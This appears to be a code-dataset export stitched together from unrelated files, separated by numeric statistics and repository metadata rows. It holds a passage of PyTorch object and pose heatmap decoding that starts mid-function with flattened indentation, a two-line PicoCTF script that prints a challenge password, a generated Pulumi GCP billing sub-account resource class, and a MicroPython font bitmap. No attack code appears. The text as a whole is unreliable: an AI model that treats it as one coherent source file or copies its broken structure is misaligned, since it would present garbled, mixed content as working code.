heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(1, heat.shape[0]):
inds = (heat[i] >= heat[i - 1])
ret[i] += ret[i - 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape).transpose(3, 2)
def _bottom_aggregate(heat):
'''
heat: batchsize x channels x h x w
'''
heat = heat.transpose(3, 2)
shape = heat.shape
heat = heat.reshape(-1, heat.shape[3])
heat = heat.transpose(1, 0).contiguous()
ret = heat.clone()
for i in range(heat.shape[0] - 2, -1, -1):
inds = (heat[i] >= heat[i + 1])
ret[i] += ret[i + 1] * inds.float()
return (ret - heat).transpose(1, 0).reshape(shape).transpose(3, 2)
def _h_aggregate(heat, aggr_weight=0.1):
return aggr_weight * _left_aggregate(heat) + \
aggr_weight * _right_aggregate(heat) + heat
def _v_aggregate(heat, aggr_weight=0.1):
return aggr_weight * _top_aggregate(heat) + \
aggr_weight * _bottom_aggregate(heat) + heat
def _topk_channel(scores, K=40):
batch, cat, height, width = scores.size()
topk_scores, topk_inds = torch.topk(scores.view(batch, cat, -1), K)
topk_inds = topk_inds % (height * width)
topk_ys = (topk_inds / width).int().float()
topk_xs = (topk_inds % width).int().float()
return topk_scores, topk_inds, topk_ys, topk_xs
def _topk(scores, K=40):
batch, cat, height, width = scores.size()
topk_scores, topk_inds = torch.topk(scores.view(batch, cat, -1), K)
topk_inds = topk_inds % (height * width)
topk_ys = (topk_inds / width).int().float()
topk_xs = (topk_inds % width).int().float()
topk_score, topk_ind = torch.topk(topk_scores.view(batch, -1), K)
topk_clses = (topk_ind / K).int()
topk_inds = _gather_feat(
topk_inds.view(batch, -1, 1), topk_ind).view(batch, K)
topk_ys = _gather_feat(topk_ys.view(batch, -1, 1), topk_ind).view(batch, K)
topk_xs = _gather_feat(topk_xs.view(batch, -1, 1), topk_ind).view(batch, K)
return topk_score, topk_inds, topk_clses, topk_ys, topk_xs
def ctdet_decode(heat, wh, reg=None, cat_spec_wh=False, K=100):
batch, cat, height, width = heat.size()
# heat = torch.sigmoid(heat)
# perform nms on heatmaps
heat = _nms(heat)
scores, inds, clses, ys, xs = _topk(heat, K=K)
if reg is not None:
reg = _transpose_and_gather_feat(reg, inds)
reg = reg.view(batch, K, 2)
xs = xs.view(batch, K, 1) + reg[:, :, 0:1]
ys = ys.view(batch, K, 1) + reg[:, :, 1:2]
else:
xs = xs.view(batch, K, 1) + 0.5
ys = ys.view(batch, K, 1) + 0.5
wh = _transpose_and_gather_feat(wh, inds)
if cat_spec_wh:
wh = wh.view(batch, K, cat, 2)
clses_ind = clses.view(batch, K, 1, 1).expand(batch, K, 1, 2).long()
wh = wh.gather(2, clses_ind).view(batch, K, 2)
else:
wh = wh.view(batch, K, 2)
clses = clses.view(batch, K, 1).float()
scores = scores.view(batch, K, 1)
bboxes = torch.cat([xs - wh[..., 0:1] / 2,
ys - wh[..., 1:2] / 2,
xs + wh[..., 0:1] / 2,
ys + wh[..., 1:2] / 2], dim=2)
detections = torch.cat([bboxes, scores, clses], dim=2)
return detections
def whole_body_decode(
heat, wh, kps, seg_feat=None, seg=None, reg=None, hm_hp=None, hp_offset=None, K=100):
batch, cat, height, width = heat.size()
num_joints = kps.shape[1] // 2
# perform nms on heatmaps
heat = _nms(heat)
scores, inds, clses, ys, xs = _topk(heat, K=K)
kps = _transpose_and_gather_feat(kps, inds)
kps = kps.view(batch, K, num_joints * 2)
kps[..., ::2] += xs.view(batch, K, 1).expand(batch, K, num_joints)
kps[..., 1::2] += ys.view(batch, K, 1).expand(batch, K, num_joints)
if reg is not None:
reg = _transpose_and_gather_feat(reg, inds)
reg = reg.view(batch, K, 2)
xs = xs.view(batch, K, 1) + reg[:, :, 0:1]
ys = ys.view(batch, K, 1) + reg[:, :, 1:2]
else:
xs = xs.view(batch, K, 1) + 0.5
ys = ys.view(batch, K, 1) + 0.5
wh = _transpose_and_gather_feat(wh, inds)
wh = wh.view(batch, K, 2)
weight = _transpose_and_gather_feat(seg, inds)
## you can write (if weight.size(1)!=seg_feat.size(1): 3x3conv else 1x1conv ) here to select seg conv.
## for 3x3
weight = weight.view([weight.size(1), -1, 3, 3])
pred_seg = F.conv2d(seg_feat, weight, stride=1, padding=1)
clses = clses.view(batch, K, 1).float()
scores = scores.view(batch, K, 1)
bboxes = torch.cat([xs - wh[..., 0:1] / 2,
ys - wh[..., 1:2] / 2,
xs + wh[..., 0:1] / 2,
ys + wh[..., 1:2] / 2], dim=2)
if hm_hp is not None:
hm_hp = _nms(hm_hp)
thresh = 0.1
kps = kps.view(batch, K, num_joints, 2).permute(
0, 2, 1, 3).contiguous() # b x J x K x 2
reg_kps = kps.unsqueeze(3).expand(batch, num_joints, K, K, 2)
hm_score, hm_inds, hm_ys, hm_xs = _topk_channel(hm_hp, K=K) # b x J x K
if hp_offset is not None:
hp_offset = _transpose_and_gather_feat(
hp_offset, hm_inds.view(batch, -1))
hp_offset = hp_offset.view(batch, num_joints, K, 2)
hm_xs = hm_xs + hp_offset[:, :, :, 0]
hm_ys = hm_ys + hp_offset[:, :, :, 1]
else:
hm_xs = hm_xs + 0.5
hm_ys = hm_ys + 0.5
mask = (hm_score > thresh).float()
hm_score = (1 - mask) * -1 + mask * hm_score
hm_ys = (1 - mask) * (-10000) + mask * hm_ys
hm_xs = (1 - mask) * (-10000) + mask * hm_xs
hm_kps = torch.stack([hm_xs, hm_ys], dim=-1).unsqueeze(
2).expand(batch, num_joints, K, K, 2)
dist = (((reg_kps - hm_kps) ** 2).sum(dim=4) ** 0.5)
min_dist, min_ind = dist.min(dim=3) # b x J x K
hm_score = hm_score.gather(2, min_ind).unsqueeze(-1) # b x J x K x 1
min_dist = min_dist.unsqueeze(-1)
min_ind = min_ind.view(batch, num_joints, K, 1, 1).expand(
batch, num_joints, K, 1, 2)
hm_kps = hm_kps.gather(3, min_ind)
hm_kps = hm_kps.view(batch, num_joints, K, 2)
l = bboxes[:, :, 0].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
t = bboxes[:, :, 1].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
r = bboxes[:, :, 2].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
b = bboxes[:, :, 3].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
mask = (hm_kps[..., 0:1] < l) + (hm_kps[..., 0:1] > r) + \
(hm_kps[..., 1:2] < t) + (hm_kps[..., 1:2] > b) + \
(hm_score < thresh) + (min_dist > (torch.max(b - t, r - l) * 0.3))
mask = (mask > 0).float().expand(batch, num_joints, K, 2)
kps = (1 - mask) * hm_kps + mask * kps
kps = kps.permute(0, 2, 1, 3).contiguous().view(
batch, K, num_joints * 2)
detections = torch.cat([bboxes, scores, kps, torch.transpose(hm_score.squeeze(dim=3), 1, 2)], dim=2)
return detections, pred_seg
def multi_pose_decode(
heat, wh, kps, reg=None, hm_hp=None, hp_offset=None, K=100):
batch, cat, height, width = heat.size()
num_joints = kps.shape[1] // 2
# heat = torch.sigmoid(heat)
# perform nms on heatmaps
heat = _nms(heat)
scores, inds, clses, ys, xs = _topk(heat, K=K)
kps = _transpose_and_gather_feat(kps, inds)
kps = kps.view(batch, K, num_joints * 2)
kps[..., ::2] += xs.view(batch, K, 1).expand(batch, K, num_joints)
kps[..., 1::2] += ys.view(batch, K, 1).expand(batch, K, num_joints)
if reg is not None:
reg = _transpose_and_gather_feat(reg, inds)
reg = reg.view(batch, K, 2)
xs = xs.view(batch, K, 1) + reg[:, :, 0:1]
ys = ys.view(batch, K, 1) + reg[:, :, 1:2]
else:
xs = xs.view(batch, K, 1) + 0.5
ys = ys.view(batch, K, 1) + 0.5
wh = _transpose_and_gather_feat(wh, inds)
wh = wh.view(batch, K, 2)
clses = clses.view(batch, K, 1).float()
scores = scores.view(batch, K, 1)
bboxes = torch.cat([xs - wh[..., 0:1] / 2,
ys - wh[..., 1:2] / 2,
xs + wh[..., 0:1] / 2,
ys + wh[..., 1:2] / 2], dim=2)
if hm_hp is not None:
hm_hp = _nms(hm_hp)
thresh = 0.1
kps = kps.view(batch, K, num_joints, 2).permute(
0, 2, 1, 3).contiguous() # b x J x K x 2
reg_kps = kps.unsqueeze(3).expand(batch, num_joints, K, K, 2)
hm_score, hm_inds, hm_ys, hm_xs = _topk_channel(hm_hp, K=K) # b x J x K
if hp_offset is not None:
hp_offset = _transpose_and_gather_feat(
hp_offset, hm_inds.view(batch, -1))
hp_offset = hp_offset.view(batch, num_joints, K, 2)
hm_xs = hm_xs + hp_offset[:, :, :, 0]
hm_ys = hm_ys + hp_offset[:, :, :, 1]
else:
hm_xs = hm_xs + 0.5
hm_ys = hm_ys + 0.5
mask = (hm_score > thresh).float()
hm_score = (1 - mask) * -1 + mask * hm_score
hm_ys = (1 - mask) * (-10000) + mask * hm_ys
hm_xs = (1 - mask) * (-10000) + mask * hm_xs
hm_kps = torch.stack([hm_xs, hm_ys], dim=-1).unsqueeze(
2).expand(batch, num_joints, K, K, 2)
dist = (((reg_kps - hm_kps) ** 2).sum(dim=4) ** 0.5)
min_dist, min_ind = dist.min(dim=3) # b x J x K
hm_score = hm_score.gather(2, min_ind).unsqueeze(-1) # b x J x K x 1
min_dist = min_dist.unsqueeze(-1)
min_ind = min_ind.view(batch, num_joints, K, 1, 1).expand(
batch, num_joints, K, 1, 2)
hm_kps = hm_kps.gather(3, min_ind)
hm_kps = hm_kps.view(batch, num_joints, K, 2)
l = bboxes[:, :, 0].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
t = bboxes[:, :, 1].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
r = bboxes[:, :, 2].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
b = bboxes[:, :, 3].view(batch, 1, K, 1).expand(batch, num_joints, K, 1)
mask = (hm_kps[..., 0:1] < l) + (hm_kps[..., 0:1] > r) + \
(hm_kps[..., 1:2] < t) + (hm_kps[..., 1:2] > b) + \
(hm_score < thresh) + (min_dist > (torch.max(b - t, r - l) * 0.3))
mask = (mask > 0).float().expand(batch, num_joints, K, 2)
kps = (1 - mask) * hm_kps + mask * kps
kps = kps.permute(0, 2, 1, 3).contiguous().view(
batch, K, num_joints * 2)
detections = torch.cat([bboxes, scores, kps, torch.transpose(hm_score.squeeze(dim=3), 1, 2)], dim=2)
return detections
| 39.152104
| 108
| 0.54943
| 1,940
| 12,098
| 3.263402
| 0.069588
| 0.088138
| 0.063181
| 0.039962
| 0.844732
| 0.83336
| 0.827989
| 0.827989
| 0.823093
| 0.805718
| 0
| 0.044273
| 0.281204
| 12,098
| 308
| 109
| 39.279221
| 0.683763
| 0.039015
| 0
| 0.814815
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.049383
| false
| 0
| 0.020576
| 0.00823
| 0.119342
| 0.004115
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
ff5ee34cbb032159de8722c2021b6a308810f1e1
| 109
|
py
|
Python
|
PW Crack #2/pass.py
|
AbrahamDevs/PicoCTF-WriteUps
|
5277157d8af3ecebf013298aedba629ad0e38fda
|
[
"Unlicense"
] | null | null | null |
PW Crack #2/pass.py
|
AbrahamDevs/PicoCTF-WriteUps
|
5277157d8af3ecebf013298aedba629ad0e38fda
|
[
"Unlicense"
] | null | null | null |
PW Crack #2/pass.py
|
AbrahamDevs/PicoCTF-WriteUps
|
5277157d8af3ecebf013298aedba629ad0e38fda
|
[
"Unlicense"
] | null | null | null |
#user_pw = chr(0x63) + chr(0x30) + chr(0x30) + chr(0x30)
print(chr(0x63) + chr(0x30) + chr(0x30) + chr(0x30))
| 54.5
| 56
| 0.623853
| 19
| 109
| 3.526316
| 0.315789
| 0.626866
| 0.597015
| 0.835821
| 0.835821
| 0.835821
| 0.835821
| 0.835821
| 0
| 0
| 0
| 0.255319
| 0.137615
| 109
| 2
| 57
| 54.5
| 0.457447
| 0.504587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.296296
| 0
| 0
| 1
| 0
| true
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
|
0
| 13
|
92aafc032fdf290c0c3da48a458889f25e12534f
| 16,790
|
py
|
Python
|
sdk/python/pulumi_gcp/billing/sub_account.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 121
|
2018-06-18T19:16:42.000Z
|
2022-03-31T06:06:48.000Z
|
sdk/python/pulumi_gcp/billing/sub_account.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 492
|
2018-06-22T19:41:03.000Z
|
2022-03-31T15:33:53.000Z
|
sdk/python/pulumi_gcp/billing/sub_account.py
|
sisisin/pulumi-gcp
|
af6681d70ea457843409110c1324817fe55f68ad
|
[
"ECL-2.0",
"Apache-2.0"
] | 43
|
2018-06-19T01:43:13.000Z
|
2022-03-23T22:43:37.000Z
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from .. import _utilities
__all__ = ['SubAccountArgs', 'SubAccount']
@pulumi.input_type
class SubAccountArgs:
def __init__(__self__, *,
display_name: pulumi.Input[str],
master_billing_account: pulumi.Input[str],
deletion_policy: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a SubAccount resource.
:param pulumi.Input[str] display_name: The display name of the billing account.
:param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
:param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
"""
pulumi.set(__self__, "display_name", display_name)
pulumi.set(__self__, "master_billing_account", master_billing_account)
if deletion_policy is not None:
pulumi.set(__self__, "deletion_policy", deletion_policy)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Input[str]:
"""
The display name of the billing account.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: pulumi.Input[str]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="masterBillingAccount")
def master_billing_account(self) -> pulumi.Input[str]:
"""
The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
"""
return pulumi.get(self, "master_billing_account")
@master_billing_account.setter
def master_billing_account(self, value: pulumi.Input[str]):
pulumi.set(self, "master_billing_account", value)
@property
@pulumi.getter(name="deletionPolicy")
def deletion_policy(self) -> Optional[pulumi.Input[str]]:
"""
If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
"""
return pulumi.get(self, "deletion_policy")
@deletion_policy.setter
def deletion_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deletion_policy", value)
@pulumi.input_type
class _SubAccountState:
def __init__(__self__, *,
billing_account_id: Optional[pulumi.Input[str]] = None,
deletion_policy: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
master_billing_account: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
open: Optional[pulumi.Input[bool]] = None):
"""
Input properties used for looking up and filtering SubAccount resources.
:param pulumi.Input[str] billing_account_id: The billing account id.
:param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
:param pulumi.Input[str] display_name: The display name of the billing account.
:param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
:param pulumi.Input[str] name: The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
:param pulumi.Input[bool] open: `true` if the billing account is open, `false` if the billing account is closed.
"""
if billing_account_id is not None:
pulumi.set(__self__, "billing_account_id", billing_account_id)
if deletion_policy is not None:
pulumi.set(__self__, "deletion_policy", deletion_policy)
if display_name is not None:
pulumi.set(__self__, "display_name", display_name)
if master_billing_account is not None:
pulumi.set(__self__, "master_billing_account", master_billing_account)
if name is not None:
pulumi.set(__self__, "name", name)
if open is not None:
pulumi.set(__self__, "open", open)
@property
@pulumi.getter(name="billingAccountId")
def billing_account_id(self) -> Optional[pulumi.Input[str]]:
"""
The billing account id.
"""
return pulumi.get(self, "billing_account_id")
@billing_account_id.setter
def billing_account_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "billing_account_id", value)
@property
@pulumi.getter(name="deletionPolicy")
def deletion_policy(self) -> Optional[pulumi.Input[str]]:
"""
If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
"""
return pulumi.get(self, "deletion_policy")
@deletion_policy.setter
def deletion_policy(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "deletion_policy", value)
@property
@pulumi.getter(name="displayName")
def display_name(self) -> Optional[pulumi.Input[str]]:
"""
The display name of the billing account.
"""
return pulumi.get(self, "display_name")
@display_name.setter
def display_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "display_name", value)
@property
@pulumi.getter(name="masterBillingAccount")
def master_billing_account(self) -> Optional[pulumi.Input[str]]:
"""
The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
"""
return pulumi.get(self, "master_billing_account")
@master_billing_account.setter
def master_billing_account(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "master_billing_account", value)
@property
@pulumi.getter
def name(self) -> Optional[pulumi.Input[str]]:
"""
The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
"""
return pulumi.get(self, "name")
@name.setter
def name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "name", value)
@property
@pulumi.getter
def open(self) -> Optional[pulumi.Input[bool]]:
"""
`true` if the billing account is open, `false` if the billing account is closed.
"""
return pulumi.get(self, "open")
@open.setter
def open(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "open", value)
class SubAccount(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deletion_policy: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
master_billing_account: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Allows creation and management of a Google Cloud Billing Subaccount.
!> **WARNING:** Deleting this resource will not delete or close the billing subaccount.
```python
import pulumi
import pulumi_gcp as gcp
subaccount = gcp.billing.SubAccount("subaccount",
display_name="My Billing Account",
master_billing_account="012345-567890-ABCDEF")
```
## Import
Billing Subaccounts can be imported using any of these accepted formats
```sh
$ pulumi import gcp:billing/subAccount:SubAccount default billingAccounts/{billing_account_id}
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
:param pulumi.Input[str] display_name: The display name of the billing account.
:param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: SubAccountArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
Allows creation and management of a Google Cloud Billing Subaccount.
!> **WARNING:** Deleting this resource will not delete or close the billing subaccount.
```python
import pulumi
import pulumi_gcp as gcp
subaccount = gcp.billing.SubAccount("subaccount",
display_name="My Billing Account",
master_billing_account="012345-567890-ABCDEF")
```
## Import
Billing Subaccounts can be imported using any of these accepted formats
```sh
$ pulumi import gcp:billing/subAccount:SubAccount default billingAccounts/{billing_account_id}
```
:param str resource_name: The name of the resource.
:param SubAccountArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SubAccountArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
deletion_policy: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
master_billing_account: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SubAccountArgs.__new__(SubAccountArgs)
__props__.__dict__["deletion_policy"] = deletion_policy
if display_name is None and not opts.urn:
raise TypeError("Missing required property 'display_name'")
__props__.__dict__["display_name"] = display_name
if master_billing_account is None and not opts.urn:
raise TypeError("Missing required property 'master_billing_account'")
__props__.__dict__["master_billing_account"] = master_billing_account
__props__.__dict__["billing_account_id"] = None
__props__.__dict__["name"] = None
__props__.__dict__["open"] = None
super(SubAccount, __self__).__init__(
'gcp:billing/subAccount:SubAccount',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
billing_account_id: Optional[pulumi.Input[str]] = None,
deletion_policy: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
master_billing_account: Optional[pulumi.Input[str]] = None,
name: Optional[pulumi.Input[str]] = None,
open: Optional[pulumi.Input[bool]] = None) -> 'SubAccount':
"""
Get an existing SubAccount resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] billing_account_id: The billing account id.
:param pulumi.Input[str] deletion_policy: If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
:param pulumi.Input[str] display_name: The display name of the billing account.
:param pulumi.Input[str] master_billing_account: The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
:param pulumi.Input[str] name: The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
:param pulumi.Input[bool] open: `true` if the billing account is open, `false` if the billing account is closed.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SubAccountState.__new__(_SubAccountState)
__props__.__dict__["billing_account_id"] = billing_account_id
__props__.__dict__["deletion_policy"] = deletion_policy
__props__.__dict__["display_name"] = display_name
__props__.__dict__["master_billing_account"] = master_billing_account
__props__.__dict__["name"] = name
__props__.__dict__["open"] = open
return SubAccount(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="billingAccountId")
def billing_account_id(self) -> pulumi.Output[str]:
"""
The billing account id.
"""
return pulumi.get(self, "billing_account_id")
@property
@pulumi.getter(name="deletionPolicy")
def deletion_policy(self) -> pulumi.Output[Optional[str]]:
"""
If set to "RENAME_ON_DESTROY" the billing account display_name
will be changed to "Destroyed" along with a timestamp. If set to "" this will not occur.
Default is "".
"""
return pulumi.get(self, "deletion_policy")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
The display name of the billing account.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="masterBillingAccount")
def master_billing_account(self) -> pulumi.Output[str]:
"""
The name of the master billing account that the subaccount
will be created under in the form `{billing_account_id}` or `billingAccounts/{billing_account_id}`.
"""
return pulumi.get(self, "master_billing_account")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
The resource name of the billing account in the form `billingAccounts/{billing_account_id}`.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter
def open(self) -> pulumi.Output[bool]:
"""
`true` if the billing account is open, `false` if the billing account is closed.
"""
return pulumi.get(self, "open")
| 43.385013
| 134
| 0.651936
| 1,991
| 16,790
| 5.243094
| 0.088398
| 0.147524
| 0.07108
| 0.061117
| 0.829677
| 0.802855
| 0.76492
| 0.737427
| 0.727177
| 0.702845
| 0
| 0.001994
| 0.253186
| 16,790
| 386
| 135
| 43.497409
| 0.830529
| 0.371948
| 0
| 0.553299
| 1
| 0
| 0.113605
| 0.026873
| 0
| 0
| 0
| 0
| 0
| 1
| 0.15736
| false
| 0.005076
| 0.025381
| 0
| 0.279188
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
2ba44b6cabc2124caf0be3c0a326b51935bb9868
| 3,331
|
py
|
Python
|
frozen/font12.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 45
|
2018-04-02T22:24:47.000Z
|
2022-03-27T14:34:06.000Z
|
frozen/font12.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 2
|
2018-09-19T09:39:20.000Z
|
2019-05-23T09:56:29.000Z
|
frozen/font12.py
|
ayoy/micropython-waveshare-epd
|
58859f5d0158987c84fb20e3920af0962b37de61
|
[
"MIT"
] | 16
|
2018-04-08T21:34:28.000Z
|
2022-03-18T16:00:38.000Z
|
width = const(7)
height = const(12)
data = b'\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x10\x10\x10\x00\x00\x10\x00\x00\x00\x00lHH\x00\x00\x00\x00\x00\x00\x00\x00\x00\x14\x14(|(|(PP\x00\x00\x00\x108@@8Hp\x10\x10\x00\x00\x00 P \x0cp\x08\x14\x08\x00\x00\x00\x00\x00\x00\x18 TH4\x00\x00\x00\x00\x10\x10\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x08\x08\x10\x10\x10\x10\x10\x10\x08\x08\x00\x00 \x10\x10\x10\x10\x10\x10 \x00\x00\x10|\x10((\x00\x00\x00\x00\x00\x00\x00\x00\x10\x10\x10\xfe\x10\x10\x10\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x18\x100 \x00\x00\x00\x00\x00\x00|\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0000\x00\x00\x00\x00\x04\x04\x08\x08\x10\x10 @\x00\x00\x008DDDDDD8\x00\x00\x00\x000\x10\x10\x10\x10\x10\x10|\x00\x00\x00\x008D\x04\x08\x10 D|\x00\x00\x00\x008D\x04\x18\x04\x04D8\x00\x00\x00\x00\x0c\x14\x14$D~\x04\x0e\x00\x00\x00\x00< 8\x04\x04D8\x00\x00\x00\x00\x1c @xDDD8\x00\x00\x00\x00|D\x04\x08\x08\x08\x10\x10\x00\x00\x00\x008DD8DDD8\x00\x00\x00\x008DDD<\x04\x08p\x00\x00\x00\x00\x00\x0000\x00\x0000\x00\x00\x00\x00\x00\x00\x18\x18\x00\x00\x180 \x00\x00\x00\x00\x0c\x10`\x80`\x10\x0c\x00\x00\x00\x00\x00\x00\x00|\x00|\x00\x00\x00\x00\x00\x00\x00\xc0 \x18\x04\x18 \xc0\x00\x00\x00\x00\x00\x18$\x04\x08\x10\x000\x00\x00\x008DDLTTL@D8\x00\x00\x000\x10(((|D\xee\x00\x00\x00\x00\xf8DDxDDD\xf8\x00\x00\x00\x00<D@@@@D8\x00\x00\x00\x00\xf0HDDDDH\xf0\x00\x00\x00\x00\xfcDPpP@D\xfc\x00\x00\x00\x00~"(8( p\x00\x00\x00\x00<D@@NDD8\x00\x00\x00\x00\xeeDD|DDD\xee\x00\x00\x00\x00|\x10\x10\x10\x10\x10\x10|\x00\x00\x00\x00<\x08\x08\x08HHH0\x00\x00\x00\x00\xeeDHPpHD\xe6\x00\x00\x00\x00p $$|\x00\x00\x00\x00\xeellTTDD\xee\x00\x00\x00\x00\xeeddTTTL\xec\x00\x00\x00\x008DDDDDD8\x00\x00\x00\x00x$$$8 p\x00\x00\x00\x008DDDDDD8\x1c\x00\x00\x00\xf8DDDxHD\xe2\x00\x00\x00\x004L@8\x04\x04dX\x00\x00\x00\x00\xfe\x92\x10\x10\x10\x10\x108\x00\x00\x00\x00\xeeDDDDDD8\x00\x00\x00\x00\xeeDD(((\x10\x10\x00\x00\x00\x00\xeeDDTTTT(\x00\x00\x00\x00\xc6D(\x10\x10(D\xc6\x00\x00\x00\x00\xeeD((\x10\x10\x108\x00\x00\x00\x00|D\x08\x10\x10 D|\x00\x00\x00\x008 8\x00\x00@ 